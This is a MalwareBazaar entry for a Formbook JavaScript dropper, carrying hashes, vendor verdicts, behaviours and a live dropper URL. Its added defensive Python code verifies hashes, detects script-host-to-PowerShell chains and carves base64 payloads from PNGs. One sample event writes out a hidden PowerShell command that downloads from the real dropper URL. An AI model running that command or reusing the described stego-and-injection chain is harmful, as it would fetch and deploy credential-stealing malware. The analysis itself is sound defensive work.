MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 656fd275d35b686220d5e221c29b239b6f1462c526b97ae9c3f778ccd14fb2c6. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

Formbook

Vendor detections: 12

SHA256 hash: 656fd275d35b686220d5e221c29b239b6f1462c526b97ae9c3f778ccd14fb2c6
SHA3-384 hash: f802c69457beadb3f40a5bd8e035da393cb2d0b088575dd7162e205ddddd0523aa424f19c9bd29d0826d700c51c4755d
SHA1 hash: bb50e0aecc248a1c56e265c33b487b2701cfca57
MD5 hash: 979d8d0d2e5f1cd54641a49a9de98b77
humanhash: dakota-sweet-spaghetti-jig
File name: Enquiry.js
Signature Formbook
File size: 58'434 bytes
First seen: 2025-09-24 09:10:18 UTC
Last seen: Never
File type: Java Script (JS) js
MIME type: text/plain
ssdeep: 1536:z1Jj0p9uZgnSxIEUMgnjJCb2zlconrnUcrF9z+o92EsqJrAoL+oj7rL97giudybi:p8S42
TLSH: T1A74329EAED43952B5D139665CD756AC3CAA3411EF00ADE3C9A0D47C8FBD28A8C7097C4
Magika: javascript
Reporter ShadowOpCode
Tags:FormBook js stego xloader
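
To confirm that a file obtained elsewhere is byte-for-byte the sample catalogued here, compare it against all four digests and the size listed above rather than a single MD5 or SHA1. The Python script below is an added example for this page, not MalwareBazaar's own tooling; it uses only the standard library. The SHA256, SHA3-384, SHA1, MD5 and size constants are the values from this entry; the function names and the command-line usage are illustrative.

```python
import hashlib
import sys
from pathlib import Path

# Indicators copied from this MalwareBazaar entry (the page's own values).
ENTRY = {
    "sha256": "656fd275d35b686220d5e221c29b239b6f1462c526b97ae9c3f778ccd14fb2c6",
    "sha3_384": "f802c69457beadb3f40a5bd8e035da393cb2d0b088575dd7162e205ddddd0523"
                "aa424f19c9bd29d0826d700c51c4755d",
    "sha1": "bb50e0aecc248a1c56e265c33b487b2701cfca57",
    "md5": "979d8d0d2e5f1cd54641a49a9de98b77",
    "size": 58434,
}


def compute_hashes(data: bytes) -> dict:
    """Return the same four digests MalwareBazaar lists, plus the byte length."""
    return {
        "sha256": hashlib.sha256(data).hexdigest(),
        "sha3_384": hashlib.sha3_384(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "md5": hashlib.md5(data).hexdigest(),
        "size": len(data),
    }


def mismatches(data: bytes, expected: dict = ENTRY) -> list:
    """Sorted names of every field in `expected` that `data` does not satisfy.

    An empty list means the bytes are exactly the catalogued sample. A single
    mismatch among otherwise agreeing digests points at a copy-paste error in
    that one hash rather than at a different file.
    """
    actual = compute_hashes(data)
    return sorted(k for k, v in expected.items() if actual.get(k) != v)


def check_file(path: str, expected: dict = ENTRY) -> list:
    """Hash a file on disk and return the mismatching fields (empty == match)."""
    return mismatches(Path(path).read_bytes(), expected)


if __name__ == "__main__":
    # Hypothetical usage: python check_sample.py Enquiry.js
    bad = check_file(sys.argv[1])
    if bad:
        print("NO MATCH on: " + ", ".join(bad))
    else:
        print("MATCH: file is the catalogued sample")
```

Because every algorithm on the entry is checked, the script distinguishes "this is a different file" (all five fields disagree) from "one indicator was recorded wrongly" (exactly one disagrees), which matters when hashes are copied between tickets and blocklists.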

Intelligence


File Origin
# of uploads: 1
# of downloads: 327
Origin country: IT
Vendor Threat Intelligence

Verdict: Malicious
Score: 99.1%
Tags: obfuscate xtreme virus

Verdict: Malicious
Threat level: 10/10
Confidence: 100%
Tags: anti-vm base64 evasive fingerprint obfuscated obfuscated powershell

Verdict: Malicious
Labeled as: ObfuscatedDownloader.A.Generic

Verdict: Malicious
File Type: js
First seen: 2025-09-23T05:50:00Z UTC
Last seen: 2025-09-23T05:50:00Z UTC
Hits: ~100
Detections: Trojan.JS.SAgent.sb HEUR:Trojan-Downloader.Script.Generic HEUR:Trojan.Script.Generic

Verdict: inconclusive
YARA: 1 match(es)

Threat name: Win32.Trojan.Generic
Status: Suspicious

First seen: 2025-09-23 11:12:39 UTC
File Type: Text (JavaScript)
AV detection: 6 of 36 (16.67%)
Threat level: 5/5

Result
Malware family: formbook
Score: 10/10
Tags: family:formbook execution rat spyware stealer trojan
Behaviour
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Command and Scripting Interpreter: JavaScript
Suspicious use of SetThreadContext
Badlisted process makes network request
Command and Scripting Interpreter: PowerShell
Formbook payload
Formbook
Formbook family
Process spawned unexpected child process
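
The behaviour list above describes a process chain a detection engineer can encode: a Windows script host running the .js spawns PowerShell ("Command and Scripting Interpreter: JavaScript" then "PowerShell", "Process spawned unexpected child process"), that child makes a network request ("Badlisted process makes network request") for the image-named file listed under Malware Config, and the Formbook payload is then injected using SetThreadContext and WriteProcessMemory. The Python below is an added example, not code from MalwareBazaar or from any vendor reporting here. It scores process-creation events for the script-host-to-shell chain and treats the Dropper Extraction URL from this entry as an exact-match indicator. The event records, field names and severity scale are assumptions made for illustration; the events themselves are constructed, not a capture of this sample.

```python
import re
from dataclasses import dataclass

# The Dropper Extraction URL from this entry's Malware Config (the page's own value).
DROPPER_URL = ("http://archive.org/download/optimized_MSI_PRO_with_b64/"
               "optimized_MSI_PRO_with_b64.png")

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}          # hosts that run a .js dropper
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}     # unexpected children of a script host
IMAGE_EXTS = (".png", ".jpg", ".jpeg", ".gif", ".bmp")
URL_RE = re.compile(r"""https?://[^\s"'<>]+""", re.I)


@dataclass
class ProcEvent:
    """Minimal process-creation record (assumed schema, e.g. from Sysmon Event ID 1)."""
    pid: int
    ppid: int
    image: str      # executable base name
    cmdline: str


# Constructed events: the wscript -> powershell pair mimics the chain in the
# behaviour list; the others are benign noise to show what is not flagged.
EVENTS = [
    ProcEvent(100, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(4120, 100, "wscript.exe", r'wscript.exe "C:\Users\u\Downloads\Enquiry.js"'),
    ProcEvent(4188, 4120, "powershell.exe",
              f'powershell.exe -w hidden -ep bypass -c "iwr {DROPPER_URL} -OutFile $env:TEMP\\a.png"'),
    ProcEvent(5000, 100, "powershell.exe", r"powershell.exe -File C:\scripts\backup.ps1"),
    ProcEvent(5200, 4120, "cmd.exe", "cmd.exe /c echo hello"),
]


def score_chain(parent: ProcEvent, child: ProcEvent) -> dict:
    """Build the reasons a script-host -> shell pair is suspicious; one point each."""
    urls = URL_RE.findall(child.cmdline)
    reasons = [f"{parent.image} spawned {child.image}"]
    if urls:
        reasons.append("child command line contains a URL")
    if any(u.lower().endswith(IMAGE_EXTS) for u in urls):
        reasons.append("URL points at an image file (stego dropper pattern)")
    if DROPPER_URL in urls:
        reasons.append("URL matches the catalogued dropper IOC")
    return {"child_pid": child.pid, "urls": urls,
            "severity": len(reasons), "reasons": reasons}


def detect(events) -> list:
    """Flag every shell spawned by a script host, highest severity (max 4) first."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        parent = by_pid.get(e.ppid)
        if parent and e.image.lower() in SHELLS and parent.image.lower() in SCRIPT_HOSTS:
            hits.append(score_chain(parent, e))
    return sorted(hits, key=lambda h: -h["severity"])


if __name__ == "__main__":
    for hit in detect(EVENTS):
        print(f"pid {hit['child_pid']} severity {hit['severity']}: " + "; ".join(hit["reasons"]))
```

The parent/child relation alone (severity 1) is a useful low-confidence alert in environments where script hosts should never spawn shells; the URL and image-extension signals raise it, and the exact dropper URL from this entry makes it a confirmed hit. The backup script started from explorer.exe is never flagged because its parent is not a script host.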
Malware Config
Dropper Extraction: http://archive.org/download/optimized_MSI_PRO_with_b64/optimized_MSI_PRO_with_b64.png
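
The dropper is tagged stego and fetches a PNG whose name advertises a base64 payload, but the entry does not say how the payload is embedded. The Python below is an added example, not code from this sample, from MalwareBazaar or from any vendor; it assumes the two placements most often seen in image-carried droppers, a base64 run appended after the IEND chunk or stored inside an ancillary chunk such as tEXt, and carves every long base64 run from a PNG, decodes it and reports where it sits and whether it starts with an MZ header. The carrier images and the MZ-prefixed filler payload are constructed inline for illustration; to use it on the real file, download the PNG in an isolated environment and pass its bytes to carve_base64.

```python
import base64
import binascii
import re
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# Only long runs: short base64-looking strings occur by chance in compressed data.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{200,}={0,2}")


def png_layout(data: bytes):
    """Return ([(chunk_type, payload_start, payload_end), ...], offset just past IEND)."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    spans, pos = [], len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        start, end = pos + 8, pos + 8 + length
        spans.append((ctype.decode("latin-1"), start, end))
        pos = end + 4  # skip the CRC
        if ctype == b"IEND":
            break
    return spans, min(pos, len(data))


def _decode_run(run: bytes):
    """Decode a base64 run, trimming up to three trailing chars picked up by the regex."""
    for cut in range(4):
        try:
            return base64.b64decode(run[:len(run) - cut], validate=True)
        except (binascii.Error, ValueError):
            continue
    return None


def carve_base64(data: bytes) -> list:
    """Find long base64 runs anywhere in a PNG, decode them and locate them in the file."""
    spans, png_end = png_layout(data)
    found = []
    for m in B64_RUN.finditer(data):
        decoded = _decode_run(m.group(0))
        if decoded is None:
            continue
        if m.start() >= png_end:
            where = "trailer (after IEND)"
        else:
            where = next((f"{t} chunk" for t, s, e in spans if s <= m.start() < e),
                         "chunk header")
        found.append({"offset": m.start(), "where": where, "size": len(decoded),
                      "is_pe": decoded.startswith(b"MZ"), "data": decoded})
    return found


def _chunk(ctype: bytes, payload: bytes) -> bytes:
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


def build_carrier(hidden: bytes, in_text_chunk: bool) -> bytes:
    """Constructed 1x1 PNG carrying base64(hidden) in a tEXt chunk or appended after IEND."""
    b64 = base64.b64encode(hidden)
    ihdr = _chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0))
    idat = _chunk(b"IDAT", zlib.compress(b"\x00\x00\x00\x00"))  # filter byte + one RGB pixel
    body = PNG_SIG + ihdr + idat
    if in_text_chunk:
        body += _chunk(b"tEXt", b"Comment\x00" + b64)
    body += _chunk(b"IEND", b"")
    if not in_text_chunk:
        body += b64
    return body


# Constructed stand-in payload: an MZ header followed by filler, not real malware.
FAKE_PE = b"MZ" + bytes(range(256)) + b"\x00" * 42

if __name__ == "__main__":
    for in_text in (False, True):
        for hit in carve_base64(build_carrier(FAKE_PE, in_text)):
            print(f"offset={hit['offset']} where={hit['where']} "
                  f"size={hit['size']} pe={hit['is_pe']}")
```

A hit whose decoded bytes start with MZ is the dropped executable; a decoded blob that is itself script text or another base64 layer should be fed back through the same carver, since multi-stage encodings are common. The 200-character minimum run length is a tuning knob: lower it to catch small loaders, at the cost of false hits inside compressed IDAT data.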

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Formbook  Java Script (JS) js  656fd275d35b686220d5e221c29b239b6f1462c526b97ae9c3f778ccd14fb2c6  (this sample)
